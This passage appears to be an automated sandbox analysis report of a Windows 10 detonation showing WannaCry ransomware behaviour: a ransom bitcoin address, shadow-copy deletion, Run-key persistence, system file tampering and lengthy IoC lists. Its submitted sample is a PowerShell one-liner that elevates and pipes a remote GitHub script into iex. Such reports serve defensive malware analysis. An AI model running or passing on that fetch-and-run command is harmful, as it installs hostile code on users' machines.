Analysis
-
max time kernel
556s -
max time network
556s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 14:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win10v2004-20241007-en
Errors
General
-
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Extracted
C:\Users\Admin\Desktop\@[email protected]
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Extracted
C:\Users\Admin\Desktop\msg\m_english.wnry
http://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1701\margb1440\gutter0\ltrsect
Extracted
C:\Users\Admin\Desktop\r.wnry
wannacry
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" systempropertiesadvanced.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" systempropertiesadvanced.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Wannacry family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Drivers directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\BthHfEnum.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mrxdav.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Udecx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\vmbkmcl.sys cmd.exe File opened for modification C:\Windows\System32\drivers\acpitime.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\storqosflt.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\kbldfltr.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\vhdmp.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\vwififlt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\1394ohci.sys cmd.exe File opened for modification C:\Windows\System32\drivers\cimfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\sdstor.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\mausbhost.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mrxsmb20.sys cmd.exe File opened for modification C:\Windows\System32\drivers\videoprt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\drmkaud.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\wof.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys cmd.exe File opened for modification C:\Windows\System32\drivers\storqosflt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\agilevpn.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dumpfve.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\pmem.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\hwpolicy.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mshidkmdf.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\en-US\mgtdyn.dll.mui cmd.exe File opened for modification C:\Windows\System32\drivers\BTHUSB.SYS cmd.exe File opened for modification C:\Windows\System32\drivers\circlass.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\pcmcia.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\en-US\hidscanner.dll.mui cmd.exe File opened for modification C:\Windows\System32\drivers\bthport.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\qwavedrv.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\spaceport.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\mouhid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\acpiex.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\agilevpn.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\WdiWiFi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\winhv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\amdk8.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\bthport.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\pacer.sys cmd.exe File opened for modification C:\Windows\System32\drivers\tcpipreg.sys cmd.exe File opened for modification C:\Windows\System32\drivers\tunnel.sys cmd.exe File opened for modification C:\Windows\System32\drivers\USBHUB3.SYS cmd.exe File opened for modification C:\Windows\System32\drivers\MTConfig.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ndproxy.sys cmd.exe File opened for modification C:\Windows\System32\drivers\npfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\SerCx2.sys cmd.exe File opened for modification C:\Windows\System32\drivers\WindowsTrustedRT.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\USBHUB3.SYS.mui cmd.exe File opened for modification C:\Windows\System32\drivers\kbdhid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\KNetPwrDepBroker.sys cmd.exe File opened for modification C:\Windows\System32\drivers\SgrmAgent.sys cmd.exe File opened for modification C:\Windows\System32\drivers\usbport.sys cmd.exe File opened for modification C:\Windows\System32\drivers\VerifierExt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\battc.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\ndis.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\msiscsi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\NetAdapterCx.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rootmdm.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Ucx01000.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Dumpstorport.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\Microsoft.Bluetooth.AvrcpTransport.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\NdisImPlatform.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\portcfg.sys cmd.exe -
Manipulates Digital Signatures 4 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
description ioc Process File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll cmd.exe File opened for modification C:\Windows\SysWOW64\wintrust.dll cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll cmd.exe File opened for modification C:\Windows\System32\wintrust.dll cmd.exe -
Boot or Logon Autostart Execution: Print Processors 1 TTPs 1 IoCs
Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.
description ioc Process File opened for modification C:\Windows\System32\spool\prtprocs\x64\winprint.dll cmd.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7CE9.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7CF0.tmp ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Executes dropped EXE 34 IoCs
pid Process 6548 taskdl.exe 6124 @[email protected] 6824 @[email protected] 7140 taskhsvc.exe 6888 taskse.exe 5920 @[email protected] 7292 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 7292 taskse.exe 7552 @[email protected] 7524 taskdl.exe 8040 @[email protected] 4196 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 8032 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 2080 @[email protected] 5884 taskse.exe 4148 @[email protected] 1020 taskdl.exe 6336 taskse.exe 6440 @[email protected] 6476 taskdl.exe 7376 taskse.exe 3480 @[email protected] 8140 taskdl.exe 7704 taskse.exe 8008 @[email protected] 7280 taskdl.exe 7332 taskse.exe 7852 taskdl.exe 7836 taskdl.exe 7484 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 6840 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 4732 taskse.exe 5884 @[email protected] 7908 taskdl.exe -
Loads dropped DLL 9 IoCs
pid Process 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 5760 icacls.exe 7492 icacls.exe 7344 icacls.exe 7516 icacls.exe 1984 icacls.exe 7416 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nzfbkoaczl750 = "\"C:\\Users\\Admin\\Desktop\\tasksche.exe\"" reg.exe -
Drops desktop.ini file(s) 31 IoCs
description ioc Process File opened for modification C:\Windows\WinSxS\AMA114~1.423\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM7F8B~2.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM7F64~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM1A03~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM031C~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMBE63~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM3CA2~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM33F5~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMB420~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM10F5~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM73FD~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM82AF~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMD8BC~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMC81E~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM066F~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM0A9A~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM2651~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMF414~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AME3F0~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMD8B8~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM60C1~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM5D45~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMB161~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AME369~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM91A0~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMBA5B~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM26C1~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AMA417~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM3600~1.1_N\desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM6E1C~1.1_N\Desktop.ini cmd.exe File opened for modification C:\Windows\WinSxS\AM52EB~2.1_N\desktop.ini cmd.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 327 raw.githubusercontent.com 328 raw.githubusercontent.com 110 sites.google.com 111 sites.google.com -
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Windows\BITLOC~1\autorun.inf cmd.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\ja-jp\msobjs.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\IME\IMEJP\IMJPCMLD.DLL cmd.exe File opened for modification C:\Windows\System32\de-DE\AdmTmpl.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\fr-FR\ksfilter.inf_loc cmd.exe File opened for modification C:\Windows\System32\uk-UA\locationframework.dll.mui cmd.exe File opened for modification C:\Windows\System32\wbem\wpdbusenum.mof cmd.exe File opened for modification C:\Windows\System32\WpnUserService.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI4B6B~1.EVT cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\NT2B13~1.INF\I386\PSCRIPT5.DLL cmd.exe File opened for modification C:\Windows\System32\uk-UA\dot3hc.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\fr-FR\iepeers.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\de-DE\acpipmi.inf_loc cmd.exe File opened for modification C:\Windows\System32\en-US\cob-au.rs.mui cmd.exe File opened for modification C:\Windows\System32\en-US\WpnUserService.dll.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\de-DE\buttonconverter.inf_loc cmd.exe File opened for modification C:\Windows\System32\WsmAuto.dll cmd.exe File opened for modification C:\Windows\SysWOW64\combase.dll cmd.exe File opened for modification C:\Windows\System32\DriverStore\de-DE\rt640x64.inf_loc cmd.exe File opened for modification C:\Windows\System32\en-US\Windows.Storage.Search.dll.mui cmd.exe File opened for modification C:\Windows\System32\netiohlp.dll cmd.exe File opened for modification C:\Windows\System32\oobe\en-US\msoobeplugins.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\uk-UA\InkObjCore.dll.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\wscsvc.dll.mui cmd.exe File opened for modification C:\Windows\System32\KBDDIV2.DLL cmd.exe File opened for modification C:\Windows\System32\UevTemplateConfigItemGenerator.exe cmd.exe File opened for modification C:\Windows\SysWOW64\eapsimextdesktop.dll cmd.exe File opened for modification C:\Windows\SysWOW64\en-US\ETWCoreUIComponentsResources.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\ESENT.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\msxml3r.dll.mui cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI7808~1.EVT cmd.exe File opened for modification C:\Windows\SysWOW64\coreglobconfig.dll cmd.exe File opened for modification C:\Windows\System32\fr-FR\iertutil.dll.mui cmd.exe File opened for modification C:\Windows\System32\KBDARMW.DLL cmd.exe File opened for modification C:\Windows\SysWOW64\Speech_OneCore\Common\en-US\SpellingGrammar.0409.grxml cmd.exe File opened for modification C:\Windows\System32\KBDTZM.DLL cmd.exe File opened for modification C:\Windows\System32\dwm.exe cmd.exe File opened for modification C:\Windows\System32\es-ES\wpnservice.dll.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\dmdskres2.dll.mui cmd.exe File opened for modification C:\Windows\System32\KBDBR.DLL cmd.exe File opened for modification C:\Windows\System32\it-IT\csrss.exe.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\uDWM.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\certcli.dll cmd.exe File opened for modification C:\Windows\System32\de-DE\mblctr.exe.mui cmd.exe File opened for modification C:\Windows\System32\DriverStore\de-DE\kscaptur.inf_loc cmd.exe File opened for modification C:\Windows\System32\es-ES\modemui.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\Display.dll.mui cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\Schemas\PSMaml\hierarchy.xsd cmd.exe File opened for modification C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\WDMA_U~1.INF\USBAUDIO.sys cmd.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\wgencounter.inf_amd64_f496147578cad554\vmgencounter.sys cmd.exe File opened for modification C:\Windows\System32\en-US\winload.efi.mui cmd.exe File opened for modification C:\Windows\System32\en-US\winmmbase.dll.mui cmd.exe File opened for modification C:\Windows\SysWOW64\mmcndmgr.dll cmd.exe File opened for modification C:\Windows\System32\migwiz\replacementmanifests\DirectoryServices-ADAM-Tools-Replacement.man cmd.exe File opened for modification C:\Windows\System32\uk-UA\l2nacp.dll.mui cmd.exe File opened for modification C:\Windows\System32\WSClient.dll cmd.exe File opened for modification C:\Windows\System32\en-US\msaudite.dll.mui cmd.exe File opened for modification C:\Windows\System32\en-US\rpcrt4.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\perftrack.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\SMCCx.dll.mui cmd.exe File opened for modification C:\Windows\System32\midimap.dll cmd.exe File opened for modification C:\Windows\SysWOW64\IME\IMEJP\IMJPPRED.DLL cmd.exe File opened for modification C:\Windows\System32\fr-FR\mstask.dll.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\DocumentPerformanceEvents.dll.mui cmd.exe -
Modifies termsrv.dll 1 TTPs 1 IoCs
Commonly used to allow simultaneous RDP sessions.
description ioc Process File opened for modification C:\Windows\System32\termsrv.dll cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\PROGRA~1\WindowsApps\MID53B~1.0_X\GetHelp.exe cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI5AAA~1.0_X\MFC140~1.DLL cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MID54F~1.0_X\MICROS~2.DLL cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HX584E~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI32BC~1.0_X\Assets\CONTRA~2\AppList.targetsize-24_altform-unplated_contrast-white.png cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\ipssrl.xml cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI05FA~1.0_X\COMMON~1.UWP\Strings\en-us\View3d\3DVIEW~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HxA-Yahoo-Dark.scale-150.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\HX52EB~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI6F49~1.0_X\Assets\Images\Stickers\STCB2B~1.PNG cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\Windows\AppRepository\MI1C0A~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI6F49~1.0_X\Assets\Logos\SQUARE~4\PAINTS~1.PNG cmd.exe File opened for modification C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\MICROS~4.0_N\ACTIVA~2.LOG cmd.exe File opened for modification C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\ja\PresentationBuildTasks.resources.dll cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MIA289~1.SCA\RESOUR~1.PRI cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIF4CE~1.SCA\Assets\LOGOSC~2.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\CONTRA~2\ON7642~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI67C7~1.0_X\Assets\SC97EC~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\NOTIFI~1\FABRIC~2.CSS cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI46F3~1.0_X\Assets\CONTRA~2\PEOPLE~4.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MID54F~1.0_X\BUILDI~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI83BA~1.0_X\Assets\ThankYou\GENERI~3.JPG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI05FA~1.0_X\COMMON~1.UWP\Strings\pt-BR\View3d\3DVIEW~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI67C7~1.0_X\Assets\SC44CF~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIB44A~1.0_X\Assets\PROGRA~2.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HX6673~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI4DB5~1.0_X\Assets\AppTiles\CONTRA~2\MAPSAP~2.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~1.0_X\Assets\Store\AppIcon.targetsize-48.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MICROS~3.0_X\Assets\AppTiles\WEATHE~1\30x30\202.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI8AAC~1.0_X\images\FILEON~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\ACCESS~1\INDEX~1.HTM cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\CONTRA~2\ON66C6~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\HxCalendarAppList.targetsize-96.png cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\en-US\mshwLatin.dll.mui cmd.exe File opened for modification C:\PROGRA~1\WI54FB~1\ja-JP\WMPMediaSharing.dll.mui cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MICROS~1.SCA\Assets\CONTRA~1\AppPackageSmallTile.scale-100_contrast-black.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MIE788~1.SCA\Assets\SECOND~1\Car\LTR\CONTRA~1\WIDETI~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MID5E5~1.0_X\Assets\SplashScreen.scale-200.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI10D6~1.0_X\Assets\CONTRA~2\AppList.targetsize-64_contrast-white.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\ExchangeLargeTile.scale-150.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\RESOUR~1.PRI cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIBE99~1.0_X\Toolkit\Images\dash.png cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\ipsjpn.xml cmd.exe File opened for modification C:\PROGRA~1\COMMON~1\MICROS~1\ink\it-IT\rtscom.dll.mui cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MI7D2A~1.SCA\Assets\WOC3F4~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI92C9~1.0_X\Assets\MixedRealityPortalAppList.targetsize-32_altform-unplated.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI46F3~1.0_X\APPXSI~1.P7X cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI0D15~1.0_N\APPXSI~1.P7X cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIF104~1.0_X\Assets\AL4631~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\OutlookMailLargeTile.scale-150.png cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI6CD5~1.SCA\APPXBL~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI05FA~1.0_X\COMMON~1.UWP\Strings\sk-SK\View3d\3DVIEW~1.XML cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\CONTRA~2\AP210E~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MIF104~1.0_X\Assets\ALBE3C~1.PNG cmd.exe File opened for modification C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.5\Microsoft.Build.Framework.dll cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MID53B~1.0_X\Assets\LARGET~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HX4E18~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI83BA~1.0_X\Assets\IN4CAC~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\DELETE~1\MIE788~1.SCA\Assets\SECOND~1\DIRECT~1\Work\LTR\CONTRA~2\WIDETI~1.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI33D2~1.0_X\REACTA~1\assets\RNApp\app\uwp\images\commerce\CALL_F~2.PNG cmd.exe File opened for modification C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.5\Microsoft.Build.Utilities.v3.5.dll cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI1B86~1.SCA\Assets\GETSTA~2.PNG cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI6132~1.0_X\x64\MSWEBP~1.DLL cmd.exe File opened for modification C:\PROGRA~1\WindowsApps\MI83BA~1.0_X\Assets\INEB61~1.PNG cmd.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\WinSxS\AM0BBA~1.1_E\CSVDEE~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AM158F~1.1_N\SETTIN~1.DLL cmd.exe File opened for modification C:\Windows\WinSxS\AMC0DA~1.264\r\SEARCH~1.EXE cmd.exe File opened for modification C:\Windows\WinSxS\Backup\AMBF99~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\Catalogs\C29FA0~1.CAT cmd.exe File opened for modification C:\Windows\WinSxS\MSIL_T~1.1_D\TASKSC~1.DLL cmd.exe File opened for modification C:\Windows\WinSxS\WO9196~1.746\DRAGDR~1.DLL cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ja\System.IO.Compression.resources.dll cmd.exe File opened for modification C:\Windows\WinSxS\Catalogs\511b4c7a4a913dd7a5d0aae7854d56d17dcb85459e72a383f22b586236d00224.cat cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM44AF~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AM7BA7~1.1_J\BISRVD~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AM2B87~1.264\READIN~1.CSS cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMCEE7~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AM72DA~1.1_J\iis6.msc cmd.exe File opened for modification C:\Windows\WinSxS\WO5A2E~1.1_J\InkObj.dll.mui cmd.exe File opened for modification C:\Windows\WinSxS\AMBB7A~1.128\f\WMADMOD.DLL cmd.exe File opened for modification C:\Windows\WinSxS\Backup\AM6DD2~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMB719~2.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMC969~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AM3790~1.128\n\dxgmms2.sys cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM5EC6~3.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AMB2E3~1.1_N\SMALLI~1.PNG cmd.exe File opened for modification C:\Windows\WinSxS\AM8B33~1.102\APPXSI~1.P7X cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMD0A5~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM458B~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AM7520~1.1_N\C28C7A~1.DLL cmd.exe File opened for modification C:\Windows\WinSxS\AM8CAB~1.662\wldp.dll cmd.exe File opened for modification C:\Windows\WinSxS\AM3FAF~1.1_E\SBERES~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AM9C9B~1.126\PR3A9E~1.XRM cmd.exe File opened for modification C:\Windows\WinSxS\FileMaps\$$88E8~1.CDF cmd.exe File opened for modification C:\Windows\WinSxS\FileMaps\$$6664~1.CDF cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMF457~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AM77EC~1.488\ONNXRU~1.DLL cmd.exe File opened for modification C:\Windows\WinSxS\AM369C~1.1_U\cliconf.chm cmd.exe File opened for modification C:\Windows\WinSxS\AM3200~1.1_N\GEDA27~1.PNG cmd.exe File opened for modification 